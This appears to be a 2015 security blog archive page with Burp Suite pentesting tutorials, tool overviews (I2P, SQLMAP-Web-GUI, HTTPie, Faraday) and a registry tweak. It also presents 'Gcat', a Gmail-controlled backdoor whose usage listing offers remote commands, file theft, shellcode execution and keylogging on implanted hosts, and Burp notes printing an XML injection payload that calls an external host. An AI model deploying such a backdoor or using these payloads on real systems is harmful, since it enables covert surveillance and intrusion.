In the last article we introduced some of the useful features that  Burpsuite has to offer when performing a Web Application Penetration Te...

Burp Suite Tutorial – Web Application Penetration Testing (Part 2)

Saturday, December 26, 2015 Sensei Fedon 0 Comments

In the last article we introduced some of the useful features that Burpsuitehas to offer when performing a Web Application Penetration Test. In part 2 of this series we will explore some additional functionality including: Validating Scanner Results, Exporting Scanner Reports, Parsing XML Results, Saving a Burp Session and Burp Extensions. Lets get right to it!

Burp Suite Tutorial – Validating Scanner Results

Its always a good idea to thoroughly validate the results of any automated scanning tool. Burpsuite provides everything you need to do this on the “Scanner/Results” tab. Click on a node in the left pane to see the identified vulnerabilities associated with that target. The right-hand lower pane displays the verbose Request/Response information pertaining to the specific vulnerability selected from the right-hand upper pane.
The “Advisory” tab contains information about the vulnerability including a high-level detail, description and proposed recommendation. The “Request” & “Response” tabs will display exactly what Burpsuite sent to the target application in order to check for the vulnerability as well as what was returned by the application. Take a look at the example below.
Burp Suite Tutorial - Validating Scanner Results
Figure #1 – Validating Scanner Results

0 comments:

Burp Suite  from Portswigger is one of my favorite tools to use when performing a Web Application Penetration Test. The following is a ste...

Burp Suite Tutorial – Web Application Penetration Testing (Part 1)

Saturday, December 26, 2015 Sensei Fedon 0 Comments


Burp Suite from Portswigger is one of my favorite tools to use when performing a Web Application Penetration Test. The following is a step-by-step Burp Suite Tutorial. I will demonstrate how to properly configure and utilize many of Burp’s features. After reading this, you should be able to perform a thorough web application penetration test. This will be the first in a two-part article series.
Don't Go To Jail!
Don’t Go To Jail!
   What we will cover:
  • Outbound SOCKS Proxy Configuration
  •  Intercept & Scope Configuration
  • Manual Application Walkthrough
  • Using The Spider & Discover
  • Using The Repeater Tab
  • Using The Intruder Tab
  • Text Specific Searching
  • Using The Automated Scanner
Disclaimer: Testing web applications that you do not have written authorization to test is illegal and punishable by law.

Burp Suite Tutorial – Configure Outbound SOCKS Proxy

Depending on the scope of your engagement, it may be necessary to tunnel your burp traffic through an outbound socks proxy. This ensures that testing traffic originates from your approved testing environment.  I prefer to use a simple SSH which works nicely for this purpose. SSH out to your testing server and setup a socks proxy on your localhost via the ‘–D’ option like this.
ssh –D 9292 –l username servername
Navigate to the Options tab located near the far right of the top menu in Burp.  From the “Connections” sub-tab, Scroll down to the third section labeled “SOCKS Proxy”.  Type in localhost for the host option and 9292 for the port option.
Burp Suite Tutorial - SOCKS Proxy Settings
Now burp is configured to route traffic through your outbound SSH tunnel. Configure your browser’s proxy settings to use burp. Navigate to www.whatismyip.com and ensure your IP address is coming from your testing environment.
#ProTip I use a separate browser for web application testing.  This ensures I don’t accidently pass any personal data to one of my client’s sites such as the password to my gmail account for example.
I also prefer to use a proxy switching addon such as “SwitchySharp” for Google Chrome. This allows me to easily switch back and forth between various proxy configurations that I might need during different engagements. Here is what my configuration settings look like for Burp.
Burp Suite Tutorial - SwitchySharp Proxy Settings
Figure #2 – SwitchySharp Proxy Settings

Burp Suite Tutorial – Configure Intercept Behavior

The next thing I do is configure the proxy intercept feature. Set it to only pause on requests and responses to and from the target site.  Navigate to the “Proxy” tab under the “Options” sub-tab. The second and third headings display the configurable options for intercepting requests and responses. Uncheck the defaults and check “URL Is in target scope”.  Next turn intercept off as it is not needed for the initial application walkthrough. From the “Intercept” sub-tab ensure that the toggle button reads “Intercept is off”
Burp Suite Tutorial - Proxy Intercept Settings
Figure #3 – Proxy Intercept Settings

Burp Suite Tutorial – Application Walkthrough

For some reason, a lot of people like to skip this step. I don’t recommend this. During the initial walkthrough of your target application it is important to manually click through as much of the site as possible.  Try and resist the urge to start analyzing things in burp right a way. Instead, spend a good while and click on every link and view every page. Just like a normal user might do. Think about how the site works or how it’s “supposed” to work.
You should be thinking about the following questions:
  • What types of actions can someone do, both from an authenticated and unauthenticated perspective?
  • Do any requests appear to be processed by a server-side job or database operation?
  • Is there any information being displayed that I can control
If you stumble upon any input forms, be sure to do some manual test cases. Entering a single tick and hit submit on any Search form or zip code field you come across. You might be surprised at how often security vulnerabilities are discovered by curious exploration and not by automated scanning.

Burp Suite Tutorial – Configure Your Target Scope

Now that you have a good feel for how your target application works its time to start analyzing some GETs and Posts. However, before doing any testing with burp it’s a good idea to properly define your target scope.  This will ensure that you don’t send any potentially malicious traffic to websites that you are not authorized to test.
#ProTip I am authorized to test www.pentestgeek.com. *You* are not.
Head over to the “Target” tab and then the “Site map” sub-tab.  Select your target website from the left display pane.  Right click and choose “Add to scope’.  Next highlight all other sites in the display pane, right click and select Remove from scope.  If you’ve done this correctly your scope should look something like the image below.
Burp Suite Tutorial - Scope Settings
Figure #4 – Scope Settings

Burp Suite Tutorial – Initial Pilfering

Click on the “Target” tab and the “Site Map” sub tab.  Scroll down to the appropriate site branch and expand all the arrows until you get a complete picture of your target site.  This should include all of the individual pages you browsed as well as any javascript and css files. Take a moment to soak all of this in, try and spot files that you don’t recognize from the manual walkthrough.  You can view the response of each request in a number of different formats located on the “Resposne” tab of the bottom right display pane. Browse through each respond searching for interesting gems. Things you might be surprised to find include:
  • Developer comments
  • Email addresses
  • Usernames & passwords if you’re lucky
  • Path disclosure to other files/directories
  • Etc…

Burp Suite Tutorial – Search Specific Keywords

You can also leverage burp to do some of the heavy lifting for you. Right click on a node, from the “Engagement tools” sub-menu select “Search”. One of my favorite searches is to scan for the string “set-cookie”. This lets you know which pages are interesting enough to require a unique cookie. Cookies are commonly used by web application developers to differentiate between requests from multiple site users. This ensures that user ‘A’ doesn’t get to view the information belonging to user ‘B’. For this reason it is a good idea to identify these pages and pay special attention to them.
Burp Suite Tutorial - Search Specific Keywords
Figure #5 – Search Specific Keywords

Burp Suite Tutorial – Using Spider and Discover

After a good bit of manual poking and prodding it’s usually beneficial to allow burp to spider the host.  Just right click on the target’s root branch in the sitemap and select “Spider this host”.
Burp Suite Tutorial - Spider Feature
Figure #6 – Spider Feature
Once the spider has finished, go back to your site-map and see if you picked up any new pages.  If you have, take a manual look at them in your browser and also within burp to see if they produce anything interesting.  Are there any new login prompts, or input boxes for example? If you’re still not satisfied with all that you have found you can try Burp’s discovery module.  Right click on the target site’s root branch and from the “Engagement tools” sub-menu select “Discover Content”.  On most sites this module can and will run for a long time so it’s a good practice to keep an eye on it. Make sure that it completes or shut it off manually before it runs for too long.

Burp Suite Tutorial – Using The Repeater

The Repeater tab is arguably one of the most useful features in Burp Suite. I use it hundreds of times on every web application that I test. It is extremely valuable and also incredibly simple to use. Just right click on any request within the “Target” or “Proxy” tab and select “Send to Repeater”. Next click over to the “Repeater” tab and hit “Go”. You will see something like this.
Burp Suite Tutorial - The Repeater
Figure #7 – The Repeater
Here you can manipulate any part of the HTTP request headers and see what the response looks like. I recommend spending some good time here playing with every aspect of the HTTP request. Especial any GET/POST parameters that are besting sent along with the request.

Burp Suite Tutorial – Using The Intruder

If you are limited on time and have too many requests and individual parameters to do a thorough manual test. The Burp Intruder is a really great and powerful way to perform automated and semi-targeted fuzzing. You can use it against one or more parameters in an HTTP request. Right click on any request just as we did before and this time select “Send to Intruder”. Head over to the “Intruder” tab and click on the “Positions” sub-tab. You should see something like this.
Burp Suite Tutorial - Intruder Positions
Figure #8 – Intruder Positions
I recommend using the “Clear” button to remove what is selected at first. The default behavior is to test everything with an ‘=’ sign. Highlight the parameters you wan’t to fuzz and click “Add”. Next you need to go to the “Payloads” sub-tab and tell Burp which test cases to perform during the fuzzing run. A good one to start off with is “Fuzzing – full”. this will send a number of basic test cases to every parameter that you highlighted on the “Positions” sub-tab.
Burp Suite Tutorial - Intruder Payloads
Figure #9 – Intruder Payloads

Burp Suite Tutorial – Automated Scanning

The last thing that I do when testing a web application is perform an automated scan using Burp. Back on your “Site map” sub-tab, right click on the root branch of your target site and select “Passively scan this host”. This will analyze every request and response that you have generated during your burp session. It will produce a vulnerability advisor on the “Results” sub-tab located on the “Scanner” tab. I like to do the passive scan first because it doesn’t send any traffic to the target server. Alternatively you can configure Burp to passively analyze requests and responses automatically in the “Live scanning” sub-tab. You can also do this for Active Scanning but I do not recommend it.
When doing an active scan I like to use the following settings.
Burp Suite Tutorial - Active Scan Settings
Figure #10 – Active Scan Settings

Burp Suite Tutorial – End Of Part1

Hopefully you’ve learned some useful techniques for performing Web Application Penetration Testing. In Part 2, we will go over some more of Burp’s features. We will cover reporting and exporting session data for collaboration with other pentesters. I look forward to seeing you there. Thank you for reading and as always, Hack responsibly.
Source: pentestgeek.com

0 comments:

Windows Registry hack can make your Windows Defender a super adware killer Everyone hates including me hates adware. They are worst u...

An easy Registry hack in Windows Defender makes it a efficient adware killer

Sunday, December 20, 2015 Sensei Fedon 0 Comments


Windows Registry hack can make your Windows Defender a super adware killer

Everyone hates including me hates adware. They are worst unwanted critters of any operating system especially Windows 7/8.1 or the newly released Windows 10. Though there are several trusted Apps to remove such malware it is always better to have a native application that can kill such adware in the bud.
Yesterday Microsoft announced that its new enterprise security products come with a new feature that also stops potentially unwanted software and adware. The functionality was actually first made available to enterprises. To protect them against unwanted applications, Microsoft added a new opt-in feature to the enterprise solutions System Center Endpoint Protection (SCEP) and Forefront Endpoint Protection (FEP). Combined with Windows Defender these applications are able to block downloading and installing unwanted software. The Windows Defender detect and remove now also potentially unwanted applications (PUAs) such as adware that piggybacking is installed with freeware tools.
However this was only for enterprises and businesses. Luckily for us, a German website, Heise has discovered that tweaking the Windows Defender entry in the Windows Registry can make it a potent adware killer. Windows Defender is Microsoft’s security solution and available on all systems since Windows 8, it can be considered the successor to Microsoft’s Security Essentials.
Easy registry hack makes Windows Defender an adware killer
Courtesy Heise

How to go about it

Heise has discovered that using a registry hack it’s also possible to consumers to get the additional protection.  According to Heise the hack works well in Windows 7, Windows 8.1 and Windows 10 Home and Pro versions. It can easily kill the adware once you make changes in your Registry Keys.

How To Open Registry Editor

  1. In Windows 10 or Windows 8.1, right-click or tap-and-hold the Start button and then choose Run. Prior to Windows 8.1, Run is most easily available from the Apps screen.In Windows 7 or Windows Vista, click on Start.In Windows XP, click on the Start button and then click Run….
  2. In the search box, or Run window, type the following:
    regedit
    and then press Enter.
    Note: Depending on your version of Windows, and how it’s configured, you may see a User Account Control dialog box where you’ll need to confirm that you want to open Registry Editor.
  3. Registry Editor will open.
To activate the adware killer feature in Windows Defender an entry in the registry under “HKEY_LOCAL_MACHINE \ Software \ Policies \ Microsoft \ Windows Defender \ MpEngine” with a DWORD named “MpEnablePus” with the value “1” is to be made.  
To enable the feature you can add the text below to ‘defender.reg’. After you open the file the changes are made. You can also download this file (save as). Double click on the file and it will automatically be saved in the Registry.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine] “MpEnablePus”=dword:00000001
Do remember to backup your Registry before embarking on this hack. Also kindly do it at your own risk.

0 comments:

I2P is an anonymous network, exposing a simple layer that applications can use to anonymously and securely send messages to each other....

I2P - The Invisible Internet Project

Monday, September 28, 2015 Sensei Fedon 0 Comments


I2P is an anonymous network, exposing a simple layer that applications can use to anonymously and securely send messages to each other. The network itself is strictly message based (a la IP), but there is a library available to allow reliable streaming communication on top of it (a la TCP). All communication is end to end encrypted (in total there are four layers of encryption used when sending a message), and even the end points ("destinations") are cryptographic identifiers (essentially a pair of public keys).

How does it work?

To anonymize the messages sent, each client application has their I2P "router" build a few inbound and outbound "tunnels" - a sequence of peers that pass messages in one direction (to and from the client, respectively). In turn, when a client wants to send a message to another client, the client passes that message out one of their outbound tunnels targeting one of the other client's inbound tunnels, eventually reaching the destination. Every participant in the network chooses the length of these tunnels, and in doing so, makes a tradeoff between anonymity, latency, and throughput according to their own needs. The result is that the number of peers relaying each end to end message is the absolute minimum necessary to meet both the sender's and the receiver's threat model.
The first time a client wants to contact another client, they make a query against the fully distributed "network database" - a custom structured distributed hash table (DHT) based off the Kademlia algorithm. This is done to find the other client's inbound tunnels efficiently, but subsequent messages between them usually includes that data so no further network database lookups are required.

What can you do with it?

Within the I2P network, applications are not restricted in how they can communicate - those that typically use UDP can make use of the base I2P functionality, and those that typically use TCP can use the TCP-like streaming library. We have a generic TCP/I2P bridge application ("I2PTunnel") that enables people to forward TCP streams into the I2P network as well as to receive streams out of the network and forward them towards a specific TCP/IP address.
I2PTunnel is currently used to let people run their own anonymous website ("eepsite") by running a normal webserver and pointing an I2PTunnel 'server' at it, which people can access anonymously over I2P with a normal web browser by running an I2PTunnel HTTP proxy ("eepproxy"). In addition, we use the same technique to run an anonymous IRC network (where the IRC server is hosted anonymously, and standard IRC clients use an I2PTunnel to contact it). There are other application development efforts going on as well, such as one to build an optimized swarming file transfer application (a la BitTorrent), a distributed data store (a la Freenet / MNet), and a blogging system (a fully distributed LiveJournal), but those are not ready for use yet.
I2P is not inherently an "outproxy" network - the client you send a message to is the cryptographic identifier, not some IP address, so the message must be addressed to someone running I2P. However, it is possible for that client to be an outproxy, allowing you to anonymously make use of their Internet connection. To demonstrate this, the "eepproxy" will accept normal non-I2P URLs (e.g. "http://www.i2p.net") and forward them to a specific destination that runs a squid HTTP proxy, allowing simple anonymous browsing of the normal web. Simple outproxies like that are not viable in the long run for several reasons (including the cost of running one as well as the anonymity and security issues they introduce), but in certain circumstances the technique could be appropriate.
The I2P development team is an open group, welcome to all who are interested in getting involved, and all of the code is open source. The core I2P SDK and the current router implementation is done in Java (currently working with both sun and kaffe, gcj support planned for later), and there is a simple socket based API for accessing the network from other languages (with a C library available, and both Python and Perl in development). The network is actively being developed and has not yet reached the 1.0 release, but the current roadmap describes our schedule.


0 comments:

TeemIp is an open source, WEB based, IP Adress Management (IPAM) tool that provides comprehensive IP Management capabilities. It allow...

TeemIp – IP Address Management Solution

Monday, September 28, 2015 Sensei Fedon 0 Comments


TeemIp is an open source, WEB based, IP Adress Management (IPAM) tool that provides comprehensive IP Management capabilities. It allows you to manage your IPv4 and IPv6 spaces through a simple and powerful user interface: track user requests, allocate IPs, manage your IP plan and your subnet space in accordance with best in class IP Management practices. At the same time, its CMDB allows you to manage your IT inventory and to link your CIs to the IPs they use.
TeemIp can be installed as a standalone application (default download) or as an additional module of open source iTop product (ITSM & CMDB OpenSource): http://sourceforge.net/projects/itop.

Features

  • IPv4 and IPv6 Registration
  • IPv4 and IPv6 Subnet & Range Management – Subnet calculator
  • IPv4 and IPv6 Plans Management with nesting capabilities
  • Delegation of IP space from parent to child organizations
  • Capacity Planning
  • Extended and customizable CMDB
  • Enhanced linkage capabilities between IPs and network devices or systems
  • Management of VLANs, DNS Domains, WAN Links, AS Numbers, VRFs…
  • Helpdesk & User Portal
  • Proactive mail Notifications on capacity thresholds
  • CSV import tool for all data
  • Consistency audit to check data quality
  • Multi Customer Environment supporting overlapping IP spaces
  • Data synchronization (data federation)
  • History on all data
  • … on top of iTop powerfull engine.
Check the online demo of TeemIp  at:
http://www.combodo.com/TeemIp-online-demo.html

0 comments:

A stealthy Python based backdoor that uses Gmail as a command and control server. Setup For this to work you need: A Gm...

Gcat - A stealthy Backdoor that uses Gmail as a command and control server

Monday, September 28, 2015 Sensei Fedon 0 Comments


A stealthy Python based backdoor that uses Gmail as a command and control server.
Setup
For this to work you need:
  • A Gmail account (Use a dedicated account! Do not use your personal one!)
  • Turn on "Allow less secure apps" under the security settings of the account
This repo contains two files:
  • gcat.py a script that's used to enumerate and issue commands to available clients
  • implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously setup.
You're probably going to want to compile implant.py into an executable using Pyinstaller
Usage
Gcat

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger
  • Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on
  • Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command
  • Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • That's the gist of it! But you can do much more as you can see from the usage of the script! ;)

0 comments:

PHP Frontend to work with the SQLMAP JSON API Server (sqlmapapi.py) to allow for a Web GUI to drive near full functionality of SQLMAP!...

SQLMAP-Web-GUI - Web GUI to drive near full functionality of SQLMAP

Monday, September 28, 2015 Sensei Fedon 0 Comments


PHP Frontend to work with the SQLMAP JSON API Server (sqlmapapi.py) to allow for a Web GUI to drive near full functionality of SQLMAP!
Here is a few quick videos to show that almost all of your usual SQLMAP command line functionality is still possible via this Web GUI.

Demo against: Windows 2003 Server, IIS/6.0 + ASP + MS-SQL 2005


Demo against: Linux (CentOS), Apache, MySQL, PHP


Requirements:
  • Linux, Apache, PHP (check your favorite distro's wiki or forum pages, or use google)
    • PHP 5.3+ is suggested, older versions not tests so mileage may vary
  • Python and any SQLMAP dependencies (refer to their wiki for any help there)
  • Clone this repo to your machine
    • Edit the sqlmap/inc/config.php file so the paths all point to the right locations on your system
    • Copy the entire sqlmap/ directory and contents to your web root directory (cd SQLMAP-Web-GUI && cp -R sqlmap/ /var/www/)
    • When you want to use, simply fire up the sqlmap API server (python /home/user/tools/sqlmap/sqlmapapi.py -s)
    • Then you can navigate to the Web GUI address in your Browser to begin (firefox http://127.0.0.1/sqlmap/index.php)

0 comments:

HTTPie (pronounced aych-tee-tee-pie ) is a command line HTTP client . Its goal is to make CLI interaction with web services as human-fr...

HTTPie - a CLI, cURL-like tool for humans

Monday, September 28, 2015 Sensei Fedon 0 Comments


HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.

Main Features
  • Expressive and intuitive syntax
  • Formatted and colorized terminal output
  • Built-in JSON support
  • Forms and file uploads
  • HTTPS, proxies, and authentication
  • Arbitrary request data
  • Custom headers
  • Persistent sessions
  • Wget-like downloads
  • Python 2.6, 2.7 and 3.x support
  • Linux, Mac OS X and Windows support
  • Plugins
  • Documentation
  • Test coverage
Installation

On Mac OS X, HTTPie can be installed via Homebrew:
$ brew install httpie
Most Linux distributions provide a package that can be installed using the system package manager, e.g.:
# Debian-based distributions such as Ubuntu:
$ apt-get install httpie

# RPM-based distributions:
$ yum install httpie
A universal installation method (that works on Windows, Mac OS X, Linux, …, and provides the latest version) is to use pip:
# Make sure we have an up-to-date version of pip and setuptools:
$ pip install --upgrade pip setuptools

$ pip install --upgrade httpie
(If pip installation fails for some reason, you can try easy_install httpie as a fallback.)

Development version
The latest development version can be installed directly from GitHub:
# Mac OS X via Homebrew
$ brew install httpie --HEAD

# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/tarball/master

Usage

Hello World:
$ http httpie.org
Synopsis:
$ http [flags] [METHOD] URL [ITEM [ITEM]]
See also http --help.

Examples
Custom HTTP method, HTTP headers and JSON data:
$ http PUT example.org X-API-Token:123 name=John
Submitting forms:
$ http -f POST example.org hello=World
See the request that is being sent using one of the output options:
$ http -v example.org
Use Github API to post a comment on an issue with authentication:
$ http -a USERNAME POST https://api.github.com/repos/jkbrzt/httpie/issues/83/comments body='HTTPie is awesome!'
Upload a file using redirected input:
$ http example.org < file.json
Download a file and save it via redirected output:
$ http example.org/file > file
Download a file wget style:
$ http --download example.org/file
Use named sessions to make certain aspects or the communication persistent between requests to the same host:
$ http --session=logged-in -a username:password httpbin.org/get API-Key:123$ http --session=logged-in httpbin.org/headers
Set a custom Host header to work around missing DNS records:
$ http localhost:8000 Host:example.com

What follows is a detailed documentation. It covers the command syntax, advanced usage, and also features additional examples.

HTTP Method

The name of the HTTP method comes right before the URL argument:
$ http DELETE example.org/todos/7
Which looks similar to the actual Request-Line that is sent:
DELETE /todos/7 HTTP/1.1
When the METHOD argument is omitted from the command, HTTPie defaults to either GET (with no request data) or POST (with request data).

Request URL

The only information HTTPie needs to perform a request is a URL. The default scheme is, somewhat unsurprisingly, http://, and can be omitted from the argument – http example.org works just fine.
Additionally, curl-like shorthand for localhost is supported. This means that, for example :3000 would expand to http://localhost:3000 If the port is omitted, then port 80 is assumed.
$ http :/foo
GET /foo HTTP/1.1
Host: localhost
$ http :3000/bar
GET /bar HTTP/1.1
Host: localhost:3000
$ http :
GET / HTTP/1.1
Host: localhost
If you find yourself manually constructing URLs with querystring parameters on the terminal, you may appreciate the param==value syntax for appending URL parameters so that you don't have to worry about escaping the & separators. To search for HTTPie on Google Images you could use this command:
$ http GET www.google.com search==HTTPie tbm==isch
GET /?search=HTTPie&tbm=isch HTTP/1.1


0 comments:

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to...

Burp Suite Professional 1.6.26 - The Leading Toolkit for Web Application Security Testing

Monday, September 28, 2015 Sensei Fedon 0 Comments


Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
 Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Burp Suite contains the following key components:
  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.
Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

Release Notes v1.6.26
This release adds the ability to detect blind server-side XML/SOAP injection by triggering interactions with Burp Collaborator.
Previously, Burp Scanner has detected XML/SOAP injection by submitting some XML-breaking syntax like:
]]>>

and analyzing responses for any resulting error messages.
Burp now sends payloads like:
<nzf xmlns="http://a.b/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://kuiqswhjt3era6olyl63pyd.burpcollaborator.net/nzf.xsd">
nzf</nzf>
and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.
Note that this type of technique is effective even when the original parameter value does not contain XML, and there is no indication within the request or response that XML/SOAP is being used on the server side.
The new scan check uses both schema location and XInclude to cause the server-side XML parser to interact with the Collaborator server.
In addition, when the original parameter value does contain XML being submitted by the client, Burp now also uses the schema location and XInclude techniques to try to induce external service interactions. (We believe that Burp is now aware of all available tricks for inducing a server-side XML parser to interact with an external network service. But we would be very happy to hear of any others that people know about.)

0 comments:

Integrated Penetration-Test Environment Faraday v1.0.12 – Pen Test Environment (IPE) Released Faraday introduces a new con...

Integrated Penetration-Test Environment: Faraday

Monday, September 28, 2015 Sensei Fedon 0 Comments


Integrated Penetration-Test Environment

Faraday v1.0.12 – Pen Test Environment (IPE) Released
Faraday introduces a new concept (IPE) Integrated Penetration-Test Environment a multiuser Penetration test IDE. Designed for distribution, indexation and analysis of the generated data during the process of a security audit.
Integrated Penetration-Test Environment: Faraday Documentation
The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.
Design for simplicity, users should feel no difference between their own terminal application and the one included in Faraday. Developed with a specialized set of functionalities that help users improve their own work. Do you remember yourself programming without an IDE? Well, Faraday does the same an IDE does for you when programming, but from the perspective of a penetration test.
Next Generation Penetration Testing
Integrated Penetration-Test Environment: Faraday

Requirements

Modern Linux (Tested Debian / Ubuntu * / Kali / Backtrack)
  • Python 2.6.x and 2.7.x
  • Qt3
  • CouchDB >= 1.2.0
  • The following python libs:
    • mockito
    • couchdbkit
    • whoosh
    • argparse
    • psycopg2
    • IPy
    • requests

Integrated Penetration-Test Environment: Faraday Integrated Penetration-Test Environment: Faraday

Installation

Download the latest tarball by clicking here
Preferably, you can download by cloning the Git repository:
$ git clone https://github.com/infobyte/faraday.git faraday-dev
$ cd faraday-dev
$ ./install

Integrated Penetration-Test Environment: Faraday installation guide

 Faraday has more that 40+ supported tools:
Integrated Penetration-Test Environment: Faraday Integrated Penetration-Test Environment: Faraday
Source && Download
Integrated Penetration-Test Environment: Faraday download

0 comments: